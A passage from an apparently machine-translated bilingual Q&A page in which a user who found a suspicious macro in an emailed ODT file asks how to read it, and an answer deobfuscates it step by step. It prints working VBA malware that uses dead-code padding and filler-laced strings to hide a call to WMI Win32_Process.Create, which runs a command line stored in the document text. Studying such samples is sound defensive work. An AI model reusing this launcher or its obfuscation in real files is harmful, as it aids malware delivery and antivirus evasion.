
如何从odt解密奇怪的宏?

[英]How to decrypt strange macros from odt?

Hi everyone, I found this macro (and two other macros like it) in an odt file sent by email.大家好,我在 email 发送的 odt 文件中找到了这个宏(以及其他两个类似的宏)。 I know it is dangerous, so I opened it in a VM with LibreOffice on a Linux distro.我知道这很危险,所以我在 linux 发行版上的带有 libre office 的 VM 中打开它。

Option VBASupport 1
    Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
    ' Returns the argument with every occurrence of the filler token "qq)(s2)(" replaced.
    ' Only the two statements after label hTTQEJEAC do any work. Each GoTo jumps to a label
    ' that is followed by another GoTo or by the next live statement, so the
    ' Dim/Open/Put/Close runs between a GoTo and its label are never reached.
   GoTo GKsgQaAGE
Dim NmmcJMB As String 'POyDeJ
Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154
Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154
Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154
Put #154, , NmmcJMB
Close #154
GKsgQaAGE:
GoTo fIjVkJj
Dim jFUMUmIIJ As String 'NskblDD
Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146
Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146
Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146
Put #146, , jFUMUmIIJ
Close #146
fIjVkJj:
GoTo hTTQEJEAC
Dim OybSq As String 'kEafA
Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227
Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227
Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227
Put #227, , OybSq
Close #227
hTTQEJEAC:
' Live code. The search string concatenates to "qq)(s2)(". HBYVV is "" and
' W5ya1q1z48ltq3z_ is not assigned anywhere in this listing, so the replacement is
' presumably an empty value - confirm against the full module.
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
   GoTo mJsZBCEFo
Dim jUDsXM As String 'gtpnJOwLd
Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131
Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131
Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131
Put #131, , jUDsXM
Close #131
mJsZBCEFo:
GoTo BOzmWI
Dim CJeaFB As String 'jtrvFEWLD
Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124
Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124
Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124
Put #124, , CJeaFB
Close #124
BOzmWI:
GoTo kPMjtUB
Dim eVbTfoFi As String 'xTUBS
Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149
Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149
Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149
Put #149, , eVbTfoFi
Close #149
kPMjtUB:
End Function
Function Tujor4m47ob()
' Builds an object name from filler-padded string fragments, creates that object, and calls
' its Create method with text read from the document. Every Dim/Open/Put/Close run sits
' between a GoTo and its target label and is never reached; only the statements that
' directly follow a label (and are not themselves a GoTo) execute.
' On Error Resume Next suppresses run-time errors, so a failing step is skipped silently.
On Error Resume Next
' Reads item 1 of T6dwlv_ivpoiq2.StoryRanges. T6dwlv_ivpoiq2 is not defined in this listing;
' without Set, the assignment presumably stores the range's text - confirm against the document.
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
   GoTo aektCnFI
Dim jaJUkAFeG As String 'cwxgFSS
Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201
Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201
Open "shyujG.RFwdH.VPRoIX" For Binary As 201
Put #201, , jaJUkAFeG
Close #201
aektCnFI:
GoTo RtfzGtt
Dim WWCACxG As String 'mRJNaEGtF
Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153
Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153
Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153
Put #153, , WWCACxG
Close #153
RtfzGtt:
GoTo QSISC
Dim qVbhwsATQ As String 'HGHRiZB
Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188
Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188
Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188
Put #188, , qVbhwsATQ
Close #188
QSISC:
' Fragment: with the filler "qq)(s2)(" removed this reads "p".
sng2 = "qq)(" + "s2)(pq" + _
 "q)(s2)("
' Fragment: with the filler removed this reads "rocess".
F7_if4svnte = "qq)(s" + _
 "2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
 "(sqq)(s2)(sqq)(s2)(qq)(s2)("
   GoTo nelsfX
Dim MURoCFiFB As String 'XLWzECHi
Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133
Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133
Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133
Put #133, , MURoCFiFB
Close #133
nelsfX:
GoTo huGtwmS
Dim taucEJAED As String 'KDSQqD
Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59
Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59
Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59
Put #59, , taucEJAED
Close #59
huGtwmS:
GoTo DvDefEl
Dim TfsIR As String 'hnOfJN
Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176
Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176
Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176
Put #176, , TfsIR
Close #176
DvDefEl:
' Fragment: with the filler removed this reads ":win32_".
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
 "2)(inqq)(s2)(3qq)(s" + _
 "2)(2qq)(s2)(_qq)(s2)("
   GoTo vAZQiJB
Dim xuHzWGDG As String 'RmbpI
Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141
Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141
Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141
Put #141, , xuHzWGDG
Close #141
vAZQiJB:
GoTo nmWOSYyF
Dim QPqDJP As String 'HLdYiFJHC
Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149
Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149
Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149
Put #149, , QPqDJP
Close #149
nmWOSYyF:
GoTo tWXiIJDnz
Dim PJjuJ As String 'gmzmA
Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152
Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152
Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152
Put #152, , PJjuJ
Close #152
tWXiIJDnz:
' Fragment: with the filler removed this reads "winmgmt".
R67uawfvzvw = "wqq)(s2" + _
 ")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
   GoTo SyZjrEHAG
Dim UjcXr As String 'MpbLCImG
Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52
Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52
Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52
Put #52, , UjcXr
Close #52
SyZjrEHAG:
GoTo uXAHJydE
Dim HpQEA As String 'THrtIBIAD
Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211
Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211
Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211
Put #211, , HpQEA
Close #211
uXAHJydE:
GoTo PYuemWAC
Dim DiIIF As String 'OPurH
Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129
Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129
Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129
Put #129, , DiIIF
Close #129
PYuemWAC:
' Every name here except wdKeyS is unassigned in this listing (presumably Empty). wdKeyS is
' Word's WdKey constant for the S key (83), so the result is presumably the single letter "S".
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
   GoTo UxlgEAI
Dim rFHJy As String 'zHXJG
Open "CRkMC.mCwoR.dFnkA" For Binary As 185
Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185
Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185
Put #185, , rFHJy
Close #185
UxlgEAI:
GoTo vIDVA
Dim GWbqA As String 'UxHBcFQ
Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159
Open "DrttFCz.lpfOt.UeCjC" For Binary As 159
Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159
Put #159, , GWbqA
Close #159
vIDVA:
GoTo lutoTsPkH
Dim nmwGcQ As String 'OTTxPImEN
Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217
Open "NxgIP.TARFAADew.NyFRA" For Binary As 217
Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217
Put #217, , nmwGcQ
Close #217
lutoTsPkH:
' Joins the fragments in the order "winmgmt" + "S" + ":win32_" + "p" + "rocess",
' still padded with the filler token.
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
   GoTo QdQmIDzTC
Dim akWgAQAIC As String 'rMAWIEja
Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206
Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206
Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206
Put #206, , akWgAQAIC
Close #206
QdQmIDzTC:
GoTo zNPNECkYX
Dim JZcLuFA As String 'VtNiGGmD
Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125
Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125
Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125
Put #125, , JZcLuFA
Close #125
zNPNECkYX:
GoTo vmJnC
Dim OahWDBD As String 'zMMkH
Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167
Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167
Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167
Put #167, , OahWDBD
Close #167
vmJnC:
' C0d4mc619_eaiuirzl strips the filler, leaving the WMI moniker for the Win32_Process class.
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
   GoTo sFyhnDDx
Dim PCRIYp As String 'pMvRFAK
Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203
Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203
Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203
Put #203, , PCRIYp
Close #203
sFyhnDDx:
GoTo RKPFYlFb
Dim pRdXtubFT As String 'gfQxcwC
Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158
Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158
Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158
Put #158, , pRdXtubFT
Close #158
RKPFYlFb:
GoTo vmlpJOA
Dim HUPVnvFAA As String 'WkgKBIH
Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191
Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191
Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191
Put #191, , HUPVnvFAA
Close #191
vmlpJOA:
' Creates the object named by the de-filled string. The name is built at run time, so it
' never appears as a literal in the macro source.
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
   GoTo PViTAAED
Dim KMChE As String 'tdXnByPb
Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94
Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94
Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94
Put #94, , KMChE
Close #94
PViTAAED:
GoTo RBFRbHBg
Dim DqWYFGG As String 'UDjSMF
Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214
Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214
Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214
Put #214, , DqWYFGG
Close #214
RBFRbHBg:
GoTo SFgGtIlpD
Dim GDZZqGDJ As String 'FpwxECGKS
Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106
Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106
Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106
Put #106, , GDZZqGDJ
Close #106
SFgGtIlpD:
' Keeps the document text from the fifth character onwards (drops the first four).
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
   GoTo xjadBeU
Dim nmTHypHA As String 'DVUNjGqL
Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127
Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127
Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127
Put #127, , nmTHypHA
Close #127
xjadBeU:
GoTo wWUQDA
Dim AEazvYO As String 'WmUZOHEM
Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55
Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55
Open "lEilB.QvPXD.cMfWCJO" For Binary As 55
Put #55, , AEazvYO
Close #55
wWUQDA:
GoTo xFoIFC
Dim YFLpuEi As String 'WteBl
Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203
Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203
Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203
Put #203, , YFLpuEi
Close #203
xFoIFC:
   GoTo QGPRjInP
Dim WKiiJDVJq As String 'yoOwJD
Open "qyXGFD.Mnoog.UnkFG" For Binary As 109
Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109
Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109
Put #109, , WKiiJDVJq
Close #109
QGPRjInP:
GoTo AsvyFHHC
Dim FymJHI As String 'DYLTWEF
Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175
Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175
Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175
Put #175, , FymJHI
Close #175
AsvyFHHC:
GoTo iKyOGBLAy
Dim zqgnJAxpy As String 'HZaLGI
Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150
Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150
Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150
Put #150, , zqgnJAxpy
Close #150
iKyOGBLAy:
' Calls Create on the object with the de-filled document text as first argument; for
' Win32_Process that argument is the command line. The other two arguments are names
' that are never assigned in this listing.
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
   GoTo pUmEYEJA
Dim eRlMmLKx As String 'rpaKAI
Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209
Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209
Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209
Put #209, , eRlMmLKx
Close #209
pUmEYEJA:
GoTo CUZigB
Dim rJseFDK As String 'fQYhA
Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207
Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207
Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207
Put #207, , rJseFDK
Close #207
CUZigB:
GoTo XonQB
Dim TOMwIrgJ As String 'pIUaGf
Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189
Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189
Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189
Put #189, , TOMwIrgJ
Close #189
XonQB:
   GoTo rKyfgFyfq
Dim cztpFp As String 'YwYKGv
Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138
Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138
Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138
Put #138, , cztpFp
Close #138
rKyfgFyfq:
GoTo kvkwNE
Dim ugNdBHTqJ As String 'HtmXmvT
Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202
Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202
Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202
Put #202, , ugNdBHTqJ
Close #202
kvkwNE:
GoTo UaqRCIH
Dim bgosIAI As String 'hAsNYHIgo
Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134
Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134
Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134
Put #134, , bgosIAI
Close #134
UaqRCIH:
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
' Pass-through wrapper: hands its argument to S619csvpd1v4xzk5kc and returns that result.
' The Dim/Open/Put/Close runs sit between a GoTo and its target label and are never
' reached; only three assignments execute.
' On Error Resume Next suppresses run-time errors for the rest of the function.
On Error Resume Next
   GoTo oheeCHI
Dim iVJGnsW As String 'OEDeu
Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140
Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140
Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140
Put #140, , iVJGnsW
Close #140
oheeCHI:
GoTo yPqfxADJ
Dim qTLRXCv As String 'wvoHE
Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207
Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207
Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207
Put #207, , qTLRXCv
Close #207
yPqfxADJ:
GoTo bRMAl
Dim qpTUMG As String 'FVzXiA
Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210
Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210
Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210
Put #210, , qpTUMG
Close #210
bRMAl:
' Live: copies the argument into a local.
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
   GoTo TrdMzBDZJ
Dim uhqsGuAB As String 'LyQczqYvJ
Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178
Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178
Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178
Put #178, , uhqsGuAB
Close #178
TrdMzBDZJ:
GoTo loQNDFH
Dim RBLslko As String 'BQaqZjA
Open "uxKEC.pIZoJF.srBaREc" For Binary As 135
Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135
Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135
Put #135, , RBLslko
Close #135
loQNDFH:
GoTo RjWVCNKEI
Dim XUDHDiKId As String 'DfsDD
Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141
Open "QQMFr.jWYtE.SdCsJ" For Binary As 141
Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141
Put #141, , XUDHDiKId
Close #141
RjWVCNKEI:
' Live: S619csvpd1v4xzk5kc is the function that replaces the filler token "qq)(s2)(".
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
   GoTo nMdUMleFB
Dim SLJdkBII As String 'FWRUNdgHJ
Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163
Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163
Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163
Put #163, , SLJdkBII
Close #163
nMdUMleFB:
GoTo mdgvjEeAC
Dim LbhGD As String 'XKxXUoJG
Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192
Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192
Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192
Put #192, , LbhGD
Close #192
mdgvjEeAC:
GoTo ojGsFHEEF
Dim IkDkKCv As String 'KClXGffED
Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106
Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106
Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106
Put #106, , IkDkKCv
Close #106
ojGsFHEEF:
' Live: sets the function's return value.
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
   GoTo aeMpCH
Dim ClyWRG As String 'mYWbL
Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170
Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170
Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170
Put #170, , ClyWRG
Close #170
aeMpCH:
GoTo BHZQG
Dim HvnISHlCE As String 'ffPuICmH
Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205
Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205
Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205
Put #205, , HvnISHlCE
Close #205
BHZQG:
GoTo vApdD
Dim vuEJPy As String 'OnFFAqHWH
Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167
Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167
Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167
Put #167, , vuEJPy
Close #167
vApdD:
End Function

How can I see what this actually does?我怎样才能看到这实际上是做什么的? This is clearly encrypted, but there must be a way to decrypt it; otherwise, how could it be executed on any machine?这显然是加密的,但必须有办法解密,否则如何在任何机器上执行?

If you pay attention, you will see that almost every GoTo points to another GoTo and not to actual code.如果您注意,您会发现几乎每个GoTo都指向另一个GoTo ,而不是实际代码。 Most of the code you see does not even execute.您看到的大多数代码甚至都不会执行。 It would fail with an error if it did, because it is trying to open non-existing files under the same file number, which is not allowed.如果这样做,它将失败并出现错误,因为它试图以相同的文件号打开不存在的文件,这是不允许的。

You can easily find the lines that do execute by following the GoTo chain, there is but a dozen of them.您可以通过遵循GoTo链轻松找到执行的行,只有十几个。

Having identified them and removed the dead code that only exists to confuse the antimalware software, you will end up with three rather short functions:识别出它们并删除仅存在于混淆反恶意软件的死代码后,您将得到三个相当短的函数:

Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
    ' Live statements only. The search string concatenates to "qq)(s2)("; HBYVV is "" and
    ' W5ya1q1z48ltq3z_ is never assigned here, so the replacement is presumably empty.
    HBYVV = ""
    S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
End Function

Function Tujor4m47ob()
    ' Live statements only: builds an object name from filler-padded fragments, creates the
    ' object and calls its Create method with text taken from the document.
    ' On Error Resume Next means a failing step is skipped without any visible error.
    On Error Resume Next
    ' T6dwlv_ivpoiq2 is not defined in this listing; presumably a document object.
    sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
    ' The four fragments below read "p", "rocess", ":win32_" and "winmgmt" once the
    ' filler token "qq)(s2)(" is removed.
    sng2 = "qq)(" + "s2)(pq" + _
 "q)(s2)("
    F7_if4svnte = "qq)(s" + _
 "2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
 "(sqq)(s2)(sqq)(s2)(qq)(s2)("
    Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
 "2)(inqq)(s2)(3qq)(s" + _
 "2)(2qq)(s2)(_qq)(s2)("
    R67uawfvzvw = "wqq)(s2" + _
 ")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
    ' Only wdKeyS has a value here (Word's WdKey constant for the S key, 83); the other
    ' names are never assigned, so this is presumably just "S".
    Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
    Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
    ' C0d4mc619_eaiuirzl strips the filler from the joined fragments.
    Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
    Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
    ' Document text from the fifth character onwards.
    Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
    ' First argument is the de-filled document text; the other two are never assigned.
    Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function

Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
    ' Pass-through wrapper: returns S619csvpd1v4xzk5kc applied to the argument, with
    ' run-time errors suppressed.
    On Error Resume Next
    H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
    Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
    C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function

If you then collapse the string literals into one and remove the bogus variables that are known to be empty at all times, you get:如果您随后将字符串文字合并为一个并删除已知始终为空的虚假变量,您将获得:

Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
    ' Returns the argument with every occurrence of the filler token "qq)(s2)(" removed.
    S619csvpd1v4xzk5kc = VBA.Replace(Xoyqcbzwjyi6tqiw0z, "qq)(s2)(", "")
End Function

Function Tujor4m47ob()
    ' Builds an object name from filler-padded fragments, creates the object and calls its
    ' Create method with text taken from the document. Run-time errors are suppressed.
    On Error Resume Next
    ' T6dwlv_ivpoiq2 is not defined in this listing; presumably a document object.
    sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
    ' With the filler "qq)(s2)(" removed these read "p", "rocess", ":win32_" and "winmgmt".
    sng2 = "qq)(s2)(pqq)(s2)("
    F7_if4svnte = "qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
    Vbzhqcqh1pqco1e2_ = "qq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)("
    R67uawfvzvw = "wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)("
    ' wdKeyS is Word's WdKey constant for the S key (83), so this is "S".
    Kz1yuitvz3qu6xai = ChrW(wdKeyS)
    ' Joined order: "winmgmt" + "S" + ":win32_" + "p" + "rocess", still filler-padded.
    Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
    Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
    Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
    ' Document text from the fifth character onwards.
    Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
    ' First argument is the de-filled document text; the other two are never assigned.
    Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function

Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
    ' Pass-through wrapper: returns S619csvpd1v4xzk5kc applied to the argument, with
    ' run-time errors suppressed.
    On Error Resume Next
    H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
    Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
    C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function

Now you can probably give proper names to the functions and replace the obfuscated strings with the result of deobfuscating them:现在,您可能可以为函数提供正确的名称,并将混淆后的字符串替换为对它们进行反混淆的结果:

Function RemoveBogusQqFromString(input_string)
    ' Returns input_string with every occurrence of the filler token "qq)(s2)(" removed.
    RemoveBogusQqFromString = VBA.Replace(input_string, "qq)(s2)(", "")
End Function

Function WrapperForRemoveBogusQqFromString(input_string)
    ' Pass-through to RemoveBogusQqFromString; On Error Resume Next suppresses any
    ' run-time error raised during the call.
    On Error Resume Next
    WrapperForRemoveBogusQqFromString = RemoveBogusQqFromString(input_string)
End Function

Function StartProcess()
    ' Reads text from the document, strips the filler token from it and passes the result
    ' to Win32_Process.Create. Run-time errors are suppressed, so a failed step is silent.
    On Error Resume Next
    ' T6dwlv_ivpoiq2 is not defined in this listing; presumably a document object whose
    ' first story range holds the padded command line.
    ObfuscatedCommandLineWithPrefix = T6dwlv_ivpoiq2.StoryRanges.Item(1)
    
    ' WMI moniker for the Win32_Process class; this only resolves where WMI is available.
    Set ProcessObjectInstance = CreateObject("winmgmts:win32_process")
    ' Drops the first four characters of the document text.
    ObfuscatedCommandLine = Mid(ObfuscatedCommandLineWithPrefix, 5)
    ' First argument of Create is the command line; the two "" stand in for the sample's
    ' unassigned variables.
